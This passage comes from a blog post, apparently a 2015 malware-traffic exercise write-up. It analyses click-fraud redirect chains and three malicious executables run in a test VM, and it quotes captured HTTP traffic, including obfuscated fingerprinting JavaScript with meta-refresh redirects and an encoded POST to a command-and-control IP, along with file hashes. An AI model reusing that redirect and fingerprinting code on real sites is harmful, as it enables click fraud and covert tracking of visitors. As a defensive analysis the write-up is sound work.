href=&quot;http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j=&quot; style=&quot;&quot; onclick=&quot;return window.hc();&quot;&gt;Continue&lt;\/a&gt; &lt;\/div&gt;\r\n\t.&lt;\/form&gt;\r\n\t&lt;\/div&gt;\r\n\t&lt;a href=&quot;http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j=&quot; style=&quot;margin-left:-500px&quot; onclick=&quot;return window.hc();&quot;&gt;submit&lt;\/a&gt;\r\n\t&lt;\/body&gt;\r\n\t&lt;\/html&gt;\r\n\t<\/pre>\n<p>So the page above has a script in it that I am not able to decode\/decipher, but there are a couple of things that caught my eye here. The first thing was the fact that I can see that the script is talking about Flash and Java. While I am not sure what this script is doing, I can only surmise that it is possibly doing version checks of Flash and Java to see if the system has vulnerable versions. The other thing that stood out is this line:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t&lt;noscript&gt;&lt;meta http-equiv=&quot;refresh&quot; content='1;url=http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j='&gt;&lt;\/noscript&gt;\r\n\t<\/pre>\n<p>It stood out to me because I had never seen someone use the meta-tag to do a refresh to another URL within a second of someone landing on the original page (yeah, I am still new to being an analyst and these things are cool to me &#8211; LOL). The page that comes up initially can be seen below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-3.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-3.png\" alt=\"Page before the redirect\" width=\"2176\" height=\"1256\" class=\"aligncenter size-full wp-image-264\" \/><\/a><\/p>\n<p>Once the page comes up, and the meta-tag redirect sends the user to the next page (cpv[.]popxml[.]com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j=), it looks as if there is another redirect. It also looks as if this is part of the click-fraud activity found within this malware. Here is what it looks like from the PCAP:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/click2?i=83k5qWC18S8_2&amp;f=&amp;j=rv%3Db%26ss%3D1024x713%26ws%3D752x403%26wp%3D75x75%26ce%3D1%26ck%3Djc%26cv%3D6203%26cs%3D1%26fr%3D0%26hc%3D0%26fl%3D16.0.0%26jv%3D1.7.0_71%26sc%3D32%26hr%3D3%26rf%3Dbqsearch.com%26lo%3Djfilter.popxml.com%26mb%3D0%26hb%3D0%26pl%3DWin32%26ua%3DMozilla%252F5.0%2B%28Windows%2BNT%2B6.1%253B%2BWOW64%29%2BAppleWebKit%252F537.36%2B%28KHTML%252C%2Blike%2BGecko%29%2BChrome%252F40.0.2214.111%2BSafari%252F537.36 HTTP\/1.1\r\n\tHost: cpv.popxml.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/jfilter.popxml.com\/filter?q=STEM+CELL+SERUM&amp;i=83k5qWC18S8_2&amp;t=224767242\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tLocation: http:\/\/filter.dsmedianet.com\/filter?q=STEM+CELL+SERUM&amp;i=7FlxoTbpIdU_1&amp;t=354933352\r\n\tSet-Cookie: x552284792=245747806;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 0\r\n\r\n\t-----\r\n\r\n\tGET \/filter?q=STEM+CELL+SERUM&amp;i=7FlxoTbpIdU_1&amp;t=354933352 HTTP\/1.1\r\n\tHost: filter.dsmedianet.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/jfilter.popxml.com\/filter?q=STEM+CELL+SERUM&amp;i=83k5qWC18S8_2&amp;t=224767242\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tCache-Control: no-store\r\n\tPragma: no-cache\r\n\tAge: 0\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tSet-Cookie: c-1293598575=245747806;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 4677\r\n\r\n\t&lt;!DOCTYPE HTML&gt;\r\n\t&lt;html&gt;\r\n\t&lt;head&gt;\r\n\t&lt;script type=&quot;text\/javascript&quot;&gt;\r\n\r\n\t(function(c,d){var b={K:&quot;c-1293598575=245747806&quot;,J:&quot;b&quot;,a:0,h:function(a){var b=&#x5B;],c;for(c in a)b.push(c+&quot;=&quot;+encodeURIComponent(a&#x5B;c]));return b.join(&quot;&amp;&quot;).replace(\/%20\/g,&quot;+&quot;)},g:function(a){return null==a?null:a.width+&quot;x&quot;+a.height},I:function(a){return null==a?null:a.left+&quot;x&quot;+a.top},u:function(){var a=screen.width,b=screen.height;return a&amp;&amp;b?{width:a,height:b}:null},A:function(){var a=c.innerWidth||d.documentElement.offsetWidth||d.body.clientWidth,b=c.innerHeight||d.documentElement.offsetHeight||d.body.clientHeight;\r\n\treturn a&amp;&amp;b?{width:a,height:b}:null},w:function(){return&quot;undefined&quot;!=typeof c.screenLeft?{left:c.screenLeft,top:c.screenTop}:&quot;undefined&quot;!=typeof c.screenX?{left:c.screenX,top:c.screenY}:null},D:function(){b.c=&quot;jc&quot;;b.f=Math.floor(1E4*Math.random());var a=b.c+&quot;=&quot;+b.f;d.cookie=a;return 0&gt;d.cookie.indexOf(a)?0:1},B:function(){return 0&gt;d.cookie.indexOf(b.K)?0:1},G:function(){return c==c.parent?0:1},C:function(){b.a=1;b.submit();return!1},i:function(){if(&quot;undefined&quot;!=typeof navigator.plugins&amp;&amp;&quot;object&quot;==\r\n\ttypeof navigator.plugins&#x5B;&quot;Shockwave Flash&quot;]){var a=navigator.plugins&#x5B;&quot;Shockwave Flash&quot;].description;if(a&amp;&amp;(&quot;undefined&quot;==typeof navigator.mimeTypes||!navigator.mimeTypes&#x5B;&quot;application\/x-shockwave-flash&quot;]||navigator.mimeTypes&#x5B;&quot;application\/x-shockwave-flash&quot;].enabledPlugin)){var a=a.replace(\/^.*\\s+(\\S+\\s+\\S+$)\/,&quot;$1&quot;),b=a.replace(\/^(.*)\\..*$\/,&quot;$1&quot;),d=a.replace(\/^.*\\.(.*)\\s.*$\/,&quot;$1&quot;),a=\/&#x5B;a-zA-Z]\/.test(a)?a.replace(\/^.*&#x5B;a-zA-Z]+(.*)$\/,&quot;$1&quot;):0;return b+&quot;.&quot;+d+&quot;.&quot;+a}}if(&quot;undefined&quot;!=typeof c.ActiveXObject)try{if(b=\r\n\tnew ActiveXObject(&quot;ShockwaveFlash.ShockwaveFlash&quot;))if(a=b.GetVariable(&quot;$version&quot;))return a=a.split(&quot; &quot;)&#x5B;1].split(&quot;,&quot;),a&#x5B;0]+&quot;.&quot;+a&#x5B;1]+&quot;.&quot;+a&#x5B;2]}catch(e){}return null},m:function(){for(var a=0,b=navigator.mimeTypes.length;a&lt;b;++a)if(null!=(resutl=navigator.mimeTypes&#x5B;a].type.match(\/^application\\\/x-java-applet;jpi-version=(.*)$\/)))return resutl&#x5B;1];if(navigator.plugins&amp;&amp;navigator.plugins.length)for(a=0,b=navigator.plugins.length;a&lt;b;++a)if(null!=(resutl=navigator.plugins&#x5B;a].name.match(\/^Java.*&#x5B;\\b ]+(&#x5B;\\d ]+.+)$\/)))return resutl&#x5B;1];\r\n\treturn null},s:function(){var a=d.referrer;if(!a)return a;var b=a.indexOf(&quot;:\/\/&quot;);0&lt;=b&amp;&amp;(a=a.substring(b+3));b=a.indexOf(&quot;\/&quot;);0&lt;=b&amp;&amp;(a=a.substring(0,b));return a},l:function(){return d.location.host},b:function(){return&quot;undefined&quot;!=typeof c.orientation?&quot;o&quot;:&quot;ontouchstart&quot;in d.documentElement?&quot;t&quot;:0&lt;c.navigator.msMaxTouchPoints?&quot;p&quot;:0},F:function(){if(0!=b.b())return 0;var a=d.getElementById(&quot;sw&quot;),c=a.offsetWidth;a.style.display=&quot;none&quot;;a.style.top=&quot;100%&quot;;a.style.display=&quot;block&quot;;return 0==c-a.offsetWidth?\r\n\t1:0},v:function(){var a=navigator.userAgent;if(!a)return a;1024&lt;a.length&amp;&amp;(a=a.substring(0,1024));return a},o:function(){return{rv:b.J,ss:b.g(b.u()),ws:b.g(b.A()),wp:b.I(b.w()),ce:b.D(),ck:b.c,cv:b.f,cs:b.B(),fr:b.G(),hc:b.a,fl:b.i(),jv:b.m(),sc:c.screen.colorDepth,hr:history.length,rf:b.s(),lo:b.l(),mb:b.b(),hb:b.F(),pl:navigator.platform,ua:b.v()}},submit:function(){var a=d.forms&#x5B;0];a.j.value=b.h(b.o());a.submit()},H:function(){b.submit()}};c.hc=b.C;c.jsfload=b.H})(window,document);\r\n\r\n\t&lt;\/script&gt;\r\n\t&lt;noscript&gt;&lt;meta http-equiv=&quot;refresh&quot; content='1;url=http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&amp;f=&amp;j='&gt;&lt;\/noscript&gt;\r\n\t&lt;style type=&quot;text\/css&quot;&gt;\r\n\t::-webkit-scrollbar { -webkit-appearance:none !important; }\r\n\t&lt;\/style&gt;\r\n\t&lt;\/head&gt;\r\n\t&lt;body onload=&quot;window.jsfload();&quot;&gt;\r\n\t&lt;div id=&quot;sw&quot; style=&quot;position:absolute; left:0px; width:100%; z-index:1;&quot;&gt;&lt;a href=&quot;http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&amp;f=&amp;j=&quot; onclick=&quot;return window.hc();&quot;&gt;HOME&lt;\/a&gt;&lt;\/div&gt;\r\n\t&lt;div id=&quot;main&quot; style=&quot;position:absolute; top:0px; left:0px; z-index:2; background-color:white; width:100%; height:100%; overflow:hidden; text-align:center; line-height:2;&quot;&gt;\r\n\t.&lt;form action=&quot;http:\/\/xml.dsmedianet.com\/click2&quot; method=&quot;get&quot;&gt;\r\n\t..&lt;a href=&quot;http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&amp;f=&amp;j=&quot; onclick=&quot;return window.hc();&quot;&gt;&#8206;&#8206;&#8206;&#8206;&lt;\/a&gt;\r\n\t..&lt;input type=&quot;hidden&quot; name=&quot;i&quot; value=&quot;7FlxoTbpIdU_1&quot;&gt;\r\n\t..&lt;input type=&quot;hidden&quot; name=&quot;f&quot; value=&quot;&quot;&gt;\r\n\t..&lt;input type=&quot;hidden&quot; name=&quot;j&quot; id=&quot;j&quot;&gt;\r\n\t..&lt;noscript&gt;&lt;center&gt;&lt;a href=&quot;http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&amp;f=&amp;j=&quot; style=&quot;color:white&quot; onclick=&quot;return window.hc();&quot;&gt; &lt;\/a&gt;&lt;input type=submit value='Click to proceed to your destination'&gt;&lt;\/center&gt;&lt;\/noscript&gt;\r\n\t..&lt;div style=&quot;width:20px; height:10px; overflow:hidden;&quot;&gt; &lt;a href=&quot;http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&amp;f=&amp;j=&quot; style=&quot;&quot; onclick=&quot;return window.hc();&quot;&gt;Continue&lt;\/a&gt; &lt;\/div&gt;\r\n\t.&lt;\/form&gt;\r\n\t&lt;\/div&gt;\r\n\t&lt;a href=&quot;http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&amp;f=&amp;j=&quot; style=&quot;margin-left:-500px&quot; onclick=&quot;return window.hc();&quot;&gt;submit&lt;\/a&gt;\r\n\t&lt;\/body&gt;\r\n\t&lt;\/html&gt;\r\n\t<\/pre>\n<p>So it looks like it is the same kind of script as one of the previous requests and also uses the meta-tag to do the redirect to another site. Following this site I saw that this is another redirect to another site &#8211; hxxp:\/\/3Point5Oz[.]com.<\/p>\n<p>From here I saw the last POST with Wirehark:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/ HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\tHost: 31.192.112.238\r\n\tContent-Length: 464\r\n\tCache-Control: no-cache\r\n\tCookie: RNLBSERVERID=ded1217\r\n\r\n\tcG1G2sI\/BJMuIZIOgQHbXNBCH4J7kzbM30pBJzvEm171CatQsv6vW0evAtLg59zgzURewgxOMXZs94UDJGq1a7lWJ6zWLkvfN+UI6OY2igCKnUX6EOm+L1YgOb0tA5Czz+k0Ca4tRYd6B3w2V3imGckK\/9gSEFxgDwDclvdwGolE\/isrZihMDaEIClh+Jzs+MDYaOoM8GT\/c5x7qFKB7Cy6DekTg+Ify7EYun3tBiGQLWm7zKHRKu+ydA0PypDwxFdoUWiLJX\/XKgP2XIECJ\/2bOfBoma\/5dBco3IQF0t4bmlIP3NE9CRBMlJ+kqQGT8ai1XXsc7FbNkbPLSI5jW6iip81HXPteCQhOe2waLK+6FPTbPKlEZBZwFoz6iYwuksYIcB\/+9suiqeRY3PkRakrO9siTaGcU7cwJEgYCjBuaiwUevIY2jL4zPw4M6NXsHGOtNIS233yqaCA==\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 06 Nov 2015 22:26:25 GMT\r\n\tServer: Apache\r\n\tLast-Modified: Tue, 19 Nov 2013 02:04:48 GMT\r\n\tETag: &quot;3809a1-8-4eb7e16dd3cea&quot;\r\n\tAccept-Ranges: bytes\r\n\tContent-Length: 8\r\n\tVary: Accept-Encoding\r\n\tConnection: close\r\n\tContent-Type: text\/html\r\n\tX-Pad: avoid browser bug\r\n\r\n\tded1217\r\n\t<\/pre>\n<p>So from here I decided to take the three executable files and run them on my test VM just to see what would happen. The tools used were pretty simple: Wireshark, Fiddler, Process Explorer, and Regshot. The following are my summaries of what happened when running the files. <\/p>\n<p>About the first executable found &#8211; &#8220;exec1.exe&#8221;<br \/>\n===============================================<\/p>\n<p>Based on what Regshot is telling me, there were no files dropped onto the filesystem and nothing of interest was found in the registry. I have included the <a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Regshot_fax-exec1.log_.zip\">Regshot log here<\/a>. From what I can tell, the malicious binary hooks into the &#8220;regsvr32.exe&#8221; process and starts to make callouts from that new process. Since the initial connection to the C2 failed, I do not believe that there were any more malicious files dropped onto the system. <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-5.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-5.png\" alt=\"exec1.exe trying to call home\" width=\"1398\" height=\"430\" class=\"aligncenter size-full wp-image-267\" \/><\/a><\/p>\n<p>About the second executable found &#8211; &#8220;exec2.exe&#8221;<br \/>\n===============================================<\/p>\n<p>Nothing happened when I ran this executable. BOO!<\/p>\n<p>About the third executable found &#8211; &#8220;exec3.exe&#8221;<br \/>\n===============================================<\/p>\n<p>Running this executable resulted in the same type of connections trying to be established in the PCAP. I have included the <a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Regshot_fax-exec3.log_.zip\">Regshot log here<\/a>. From what I can tell via the VirtualBox recording that I did, the malicious binary kicks off a &#8220;svchost.exe&#8221; process with 2 child processes (dllhost.exe) which seem to be the processes that are calling out to the malicious websites based on what I am seeing via &#8220;netstat -ano.&#8221; <\/p>\n<p><iframe loading=\"lazy\" title=\"Executable #3 running\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/X1vRKvhFYTU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p>Notes about files found<br \/>\n===========================<\/p>\n<p>File name: fax-exec1.exe<br \/>\nSize: 316KB<br \/>\nMD5: e2fc96114e61288fc413118327c76d93<br \/>\nSHA256: f195bc9c26e0819663a907f855f6cff1125812993b89ba9d7bc48272181e2c73<br \/>\nFirst submission: 2015-11-06 22:53:35 UTC<br \/>\nDetection ratio: 35 \/ 54<br \/>\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/f195bc9c26e0819663a907f855f6cff1125812993b89ba9d7bc48272181e2c73\/analysis\/<br \/>\nHybrid-Analysis link:<br \/>\nMalwr link: http:\/\/malwr.com\/analysis\/ZGE3NmQxMjFkZjYzNDM2YWFkNjNlNTFlYWZkYjZmM2Q\/<\/p>\n<p>File name: fax-exec2.exe<br \/>\nSize: 149KB<br \/>\nMD5: e2151a8411627ea2a288f2241735d0d0<br \/>\nSHA256: 24625e658cff6564bb37fcaf2d10784dc8b1632506c44bcdea943ead12df60bb<br \/>\nFirst submission: 2015-11-06 20:57:36 UTC<br \/>\nDetection ratio: 35 \/ 54<br \/>\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/24625e658cff6564bb37fcaf2d10784dc8b1632506c44bcdea943ead12df60bb\/analysis\/<br \/>\nHybrid-Analysis link:<br \/>\nMalwr link: http:\/\/malwr.com\/analysis\/OTJjM2UzNWM5OGNiNGYzNWJlOTc3MmVmNzJmYTAyZTQ\/<\/p>\n<p>File name: fax-exec3.exe<br \/>\nSize: 454KB<br \/>\nMD5: 35a09d67bee10c6aff48826717680c1c<br \/>\nSHA256: 47f4105cd981857f9eb1a039b60fe72b3189890abdb93798af9326c532c93c8d<br \/>\nFirst submission: 2015-11-03 13:53:01 UTC<br \/>\nDetection ratio: 41 \/ 53<br \/>\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/47f4105cd981857f9eb1a039b60fe72b3189890abdb93798af9326c532c93c8d\/analysis\/<br \/>\nHybrid-Analysis link:<br \/>\nMalwr link: http:\/\/malwr.com\/analysis\/ZjA5MjRlNTczODY1NGIyNzhhMGEwNjI3NzkxNzM2ZjY\/<br \/>\nMalwr link: http:\/\/malwr.com\/analysis\/OGRmZjQ5NTU3YjRhNDkzZmEyYjg1ZWNiOWJmNmViYjU\/<br \/>\nMalwr link: http:\/\/malwr.com\/analysis\/MTA5ZThjODVkZGYyNGQwYjg1OGE5NTc1OGI2Zjk5ODI\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So here is my write-up of the latest malware exercise from Brad. Needless to say, his description of the event that lead up to the infection is hilarious. Another great exercise to say the least. As usual, if you spot something off or something that I could improve on, drop me a comment below. Summary of the Investigation ============================== &#8211; Date and time of the activity. &gt; 2015-11-06 @ 16:22 &#8211; The infected computer&#8217;s IP address. &gt; 10.3.66.103 &#8211; The infected computer&#8217;s MAC address. &gt; Dell 00:24:e8:2d:90:81 &#8211; The infected computer&#8217;s host name. &gt; STROUT-PC &#8211; Domains and IP addresses&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=258\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-258","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=258"}],"version-history":[{"count":9,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/258\/revisions"}],"predecessor-version":[{"id":275,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/258\/revisions\/275"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}